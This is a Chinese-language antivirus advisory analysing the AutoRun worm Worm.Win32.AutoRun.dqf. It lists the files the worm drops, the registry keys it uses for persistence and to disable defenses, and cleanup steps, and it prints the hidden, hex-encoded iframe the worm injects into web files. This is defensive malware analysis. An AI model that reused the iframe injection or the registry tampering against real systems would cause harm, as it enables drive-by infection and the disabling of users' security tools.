病毒名称： Worm.Win32.AutoRun.dqf
病毒类型： 蠕虫
文件 MD5： 0459FEB79B98515FDAEAC2DBAE2A3A07
公开范围： 完全公开
危害等级： 4
文件长度： 9,829 字节
感染系统： Windows98以上版本
开发工具： Microsoft Visual C++ 6.0
加壳类型： FSG 2.0 -> bart/xt

　　该病毒属蠕虫类，病毒运行后复制自身到%System32%下，更名为exloroe.com；
复制到%System32%\dllcache下，更名为lsoss.exe；复制自身到各个驱动器根目录下，
更名为net.exe，并衍生autorun.inf文件，使病毒在用户双击打开驱动器时运行；删除
%System32%目录下的cmd.exe和cmdl32.exe文件，修改注册表，清空注册表中的启动项、
映像劫持项，添加新的启动项，删除注册表文件（.reg文件）的文件关联，试图禁用注册
表，由于键值设置错误，未能成功；删除部分安全模式相关注册表项；修改系统文件、隐
藏文件等文件的显示方式；通过修改注册表删除Windows XP的更新选项、禁用IE的
Internet选项，进制用户进入MS-DOS模式；用户无法通过双击驱动器将其打开；遍历磁盘
中所有.asp、.aspx、.htm、.html、.jsp、.php文件，在文件头部添加104个字节的网页
地址，打开被感染的文件后将通过浏览器打开被感染文件头部的网页；遍历磁盘删除文件
名前三位字符串为“cmd”且扩展名为exe的文件；对文件名起始字符串为Ipa、AV、av、
N、K、MP、R、360，且属PE格式的文件进行修改；对扩展名为“.GHO”的文件进行删除，
连接网络弹出挂马网页。

本地行为：

1、文件运行后会释放以下文件:
　　　　%HomeDrive%\net.exe 　　　　　　 9,829 字节
　　　　%HomeDrive%\autorun.inf 　　　　216 字节
　　　　%DriveLetter%\net.exe 　　　　　9,829 字节
　　　　%DriveLetter%\autorun.inf 　　　216 字节
　　　　%System32%\exloroe.com 　　　　 9,829 字节
　　　　%System32%\dllcadhe\lsoss.exe 　9,829 字节

2、删除%System32%目录下的cmd.exe和cmdl32.exe文件:

　　　　删除该文件使用户无法通过命令行查看系统中的文件、修改系统中文件的属性
　　　　等，同时删除注册表中进入MS-DOS模式相关项目。

3、感染.asp、.aspx、.htm、.html、.jsp、.php六类文件，在文件头部添加104个字节。

　　　　添加代码的内容：
　　　　<iframe src=http://%77%77%77%2E%31%35%38%64%6D%2E%63%6E
　　　　/%61%31%2E%68%74%6D width=0 height=0></iframe>
　　　　网页地址用16进制ASCII码加密，解密后地址为：
　　　　http://www.15***.cn/a1.htm
　　　　分析时该网页地址已经被清除。

4、弹出的网页地址为：http://www.15***.cn/bd.htm

5、新增注册表：

　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　　　　\Windows\CurrentVersion\Run]
　　　　注册表值: "exloroe"
　　　　类型： REG_SZ
　　　　值： "C:\WINDOWS\system32\exloroe.com"
　　　　描述：使病毒文件随计算机启动而运行。

　　　　[HKEY_CURRENT_USER\Software\Microsoft
　　　　\Windows\CurrentVersion\Policies
　　　　\Explorer\NoCommon Groups]
　　　　注册表值: "NoCommon Groups"
　　　　类型: DWORD
　　　　值: 1
　　　　描述: 删除Windows XP的“更新”选项。
　　　　
　　　　[HKEY_CURRENT_USER\Software\Microsoft
　　　　\Windows\CurrentVersion\Policies
　　　　\WinOld-App\Disabled]
　　　　注册表值: "Disabled"
　　　　类型: DWORD
　　　　值: 1
　　　　描述: 禁止用户使用MS-DOS方式进入系统。

　　　　[HKEY_CURRENT_USER\Software\Microsoft
　　　　\Windows\CurrentVersion\Policies
　　　　\WinOld-App\Disabled]
　　　　注册表值: "NoRealMode"
　　　　类型: DWORD
　　　　值: 1
　　　　描述: 禁止用户使用“关闭系统”中的
　　　　“重新启动计算机并切换到MS-DOS方式”
　　　　
　　　　[HKEY_CURRENT_USER\Software\Policies
　　　　\Microsoft\Internet Explorer\Restrictions]　　　　
　　　　注册表值: "NoBrowserOptions"
　　　　类型: REG_SZ
　　　　值: "1"
　　　　描述: 禁止使用Internet选项。

6、修改注册表：

　　　　[HKEY_CURRENT_USER\Software\Microsoft
　　　　\Windows\CurrentVersion\Explorer\Advanced]
　　　　新建键值: DWORD: "Hidden"="0"
　　　　原键值: DWORD: "Hidden"="1"
　　　　描述: 使资源管理器不显示具有隐藏属性的文件

　　　　[HKEY_CURRENT_USER\Software\Microsoft
　　　　\Windows\CurrentVersion\Explorer\Advanced]
　　　　新建键值: DWORD: "ShowSuperHidden"="0"
　　　　原键值: DWORD: "ShowSuperHidden"="1"
　　　　描述: 使资源管理器不显示具有系统属性的文件
　　　　
　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
　　　　\CurrentVersion\Explorer\Advanced\Folder
　　　　\Hidden\SHOWALL]
　　　　新建键值: 字符串: "CheckedValue"="1"
　　　　原键值: DWORD: "CheckedValue"="1"
　　　　描述: 使用户无法通过修改“文件夹选项”中的相关设置
　　　　来改变资源管理器中文件的显示方式。
　　　　
　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　　　　\Windows NT\CurrentVersion\Winlogon]
　　　　新建键值: 字符串: "System"="C:\WINDOWS\system32
　　　　\dllcache\lsoss.exe"
　　　　原键值: 字符串: "System"=""
　　　　描述: 使病毒文件lsoss.exe伴随系统启动。

7、删除注册表键值：

　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Classes
　　　　\regfile\shell\open\command]
　　　　注册表值: "@"
　　　　类型: REG_SZ
　　　　值: "regedit.exe "%1""
　　　　描述：删除注册表文件（.reg）的文件关联
　　　　
　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　　　　\Windows\CurrentVersion\Run]
　　　　注册表值: "IMJPMIG8.1"
　　　　类型: 字符串
　　　　值: ""C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE"
　　　　/Spoil /RemAdvDef /Migration32"
　　　　描述：删除该注册表启动项，会因计算机安装软件不同而不同，
　　　　这里仅列出一项，病毒会删除该路径下的所有启动项。
　　　　[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001
　　　　\Control\SafeBoot\Minimal
　　　　\{4D36E967-E325-11CE-BFC1-08002BE10318}]
　　　　注册表值: "@"
　　　　类型: 字符串
　　　　值: "DiskDrive"
　　　　描述：安全模式相关注册表项

　　　　[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001
　　　　\Control\SafeBoot\Network
　　　　\{4D36E967-E325-11CE-BFC1-08002BE10318}]
　　　　注册表值: "@"
　　　　类型: 字符串
　　　　值: "DiskDrive"
　　　　描述：安全模式相关注册表项

　　　　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
　　　　\Control\SafeBoot\Minimal
　　　　\{4D36E967-E325-11CE-BFC1-08002BE10318}]
　　　　注册表值: "@"
　　　　类型: 字符串
　　　　值: "DiskDrive"
　　　　描述：安全模式相关注册表项
　　　　
　　　　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
　　　　\Control\SafeBoot\Network
　　　　\{4D36E967-E325-11CE-BFC1-08002BE10318}]
　　　　注册表值: "@"
　　　　类型: 字符串
　　　　值: "DiskDrive"
　　　　描述：安全模式相关注册表项

网络行为:　
　
　　　　协议：TCP
　　　　域名或IP地址：www.15***.cn/a1.htm（121.15.245.***）
　　　　端口：80
　　　　对目标主机的操作：
　　　　连接挂马网站，准备下载病毒文件，但已无法找到该页面。

注： %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的
位置。
　　
　　　　%Windir% 　　　　　 　　　　　 WINDODWS所在目录
　　　　%DriveLetter%　 　　　　　　　 逻辑驱动器根目录
　　　　%ProgramFiles%　 　 　　　　　 系统程序默认安装目录
　　　　%HomeDrive% 　　　　　　　　　 当前启动的系统的所在分区
　　　　%Documents and Settings% 　　　当前用户文档根目录
　　　　%Temp% 　　　　　　　　　　　　\Documents and Settings
　　　　　　　　　　　　 　　　　　　　\当前用户\Local Settings\Temp
　　　　%System32% 　　　　　　　　　　系统的 System32文件夹
　　　　
　　　　Windows2000/NT中默认的安装路径是C:\Winnt\System32
　　　　windows95/98/me中默认的安装路径是C:\Windows\System
　　　　windowsXP中默认的安装路径是C:\Windows\System32　　
　　　　　　　　

1 、使用安天防线2008可彻底清除此病毒(推荐)，
　 　请到安天网站下载： www.antiy.com　
2 、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
　 　 (1)使用ATOOL “进程管理”关闭病毒进程
　 　 　 （选中两个进程一次删除）：
　 　 　 exloroe.com
　 　 　 lsoss.exe
　 　 (2)使用ATOOL“文件管理”删除病毒文件：
　 　 　 %HomeDrive%\net.exe
　 　 　 %HomeDrive%\autorun.inf
　 　 　 %DriveLetter%\net.exe
　 　 　 %DriveLetter%\autorun.inf
　 　 　 %System32%\exloroe.com
　 　 　 %System32%\dllcadhe\lsoss.exe
　 　 (3)恢复病毒修改的注册表项目，删除病毒添加的注册表项：
　 　 　删除病毒添加的注册表项
　 　 　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　 　 　\Windows\CurrentVersion\Run]
　 　 　注册表值: "exloroe"
　 　 　类型： REG_SZ
　 　 　值： "C:\WINDOWS\system32\exloroe.com"
　 　 　[HKEY_CURRENT_USER\Software\Microsoft
　 　 　\Windows\CurrentVersion\Policies
　 　 　\Explorer\NoCommon Groups]
　 　 　注册表值: "NoCommon Groups"
　 　 　类型: DWORD
　 　 　值: 1
　 　 　[HKEY_CURRENT_USER\Software\Microsoft
　 　 　\Windows\CurrentVersion\Policies
　 　 　\WinOld-App\Disabled]
　 　 　注册表值: "Disabled"
　 　 　类型: DWORD
　 　 　值: 1
　 　 　[HKEY_CURRENT_USER\Software\Microsoft
　 　 　\Windows\CurrentVersion\Policies
　 　 　\WinOld-App\Disabled]
　 　 　注册表值: "NoRealMode"
　 　 　类型: DWORD
　 　 　值: 1
　 　 　[HKEY_CURRENT_USER\Software\Policies
　 　 　\Microsoft\Internet Explorer\Restrictions]
　 　 　注册表值: "NoBrowserOptions"
　 　 　类型: REG_SZ
　 　 　值: "1"
　 　 　恢复病毒修改的注册表项
　 　 　[HKEY_CURRENT_USER\Software\Microsoft
　 　 　\Windows\CurrentVersion\Explorer\Advanced]
　 　 　新建键值: DWORD: "Hidden"="0"
　 　 　原键值: DWORD: "Hidden"="1"
　 　 　[HKEY_CURRENT_USER\Software\Microsoft
　 　 　\Windows\CurrentVersion\Explorer\Advanced]
　 　 　新建键值: DWORD: "ShowSuperHidden"="0"
　 　 　原键值: DWORD: "ShowSuperHidden"="1"
　 　 　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　 　 　\Windows\CurrentVersion\Explorer
　 　 　\Advanced\Folder\Hidden\SHOWALL]
　 　 　新建键值: 字符串: "CheckedValue"="1"
　 　 　原键值: DWORD: "CheckedValue"="1"
　 　 　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　 　 　\Windows NT\CurrentVersion\Winlogon]
　 　 　新建键值: 字符串: "System"="C:\WINDOWS
　 　 　\system32\dllcache\lsoss.exe"
　 　 　原键值: 字符串: "System"=""
　 　 　恢复病毒删除的注册表项
　 　 　[HKEY_LOCAL_MACHINE\SOFTWARE\Classes
　 　 　\regfile\shell\open\command]
　 　 　注册表值: "@"
　 　 　类型: REG_SZ
　 　 　值: "regedit.exe "%1""
　 　 　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　 　 　\Windows\CurrentVersion\Run]
　 　 　注册表值: "IMJPMIG8.1"
　 　 　类型: 字符串
　 　 　值: ""C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE"
　 　 　/Spoil /RemAdvDef /Migration32"
　 　 　描述：该注册表项会因计算机安装软件不同而不同，
　 　 　需要用户自己添加，或重新安装相对应的软件。
　 　 　[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001
　 　 　\Control\SafeBoot\Minimal
　 　 　\{4D36E967-E325-11CE-BFC1-08002BE10318}]
　 　 　注册表值: "@"
　 　 　类型: 字符串
　 　 　值: "DiskDrive"
　 　 　[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001
　 　 　\Control\SafeBoot\Network
　 　 　\{4D36E967-E325-11CE-BFC1-08002BE10318}]
　 　 　注册表值: "@"
　 　 　类型: 字符串
　 　 　值: "DiskDrive"
　 　 　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
　 　 　\Control\SafeBoot\Minimal
　 　 　\{4D36E967-E325-11CE-BFC1-08002BE10318}]
　 　 　注册表值: "@"
　 　 　类型: 字符串
　 　 　值: "DiskDrive"
　 　 　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
　 　 　\Control\SafeBoot\Network
　 　 　\{4D36E967-E325-11CE-BFC1-08002BE10318}]
　 　 　注册表值: "@"
　 　 　类型: 字符串
　 　 　值: "DiskDrive"

点击此处下载安天防线2008

病毒上报信箱: submit@virusview.net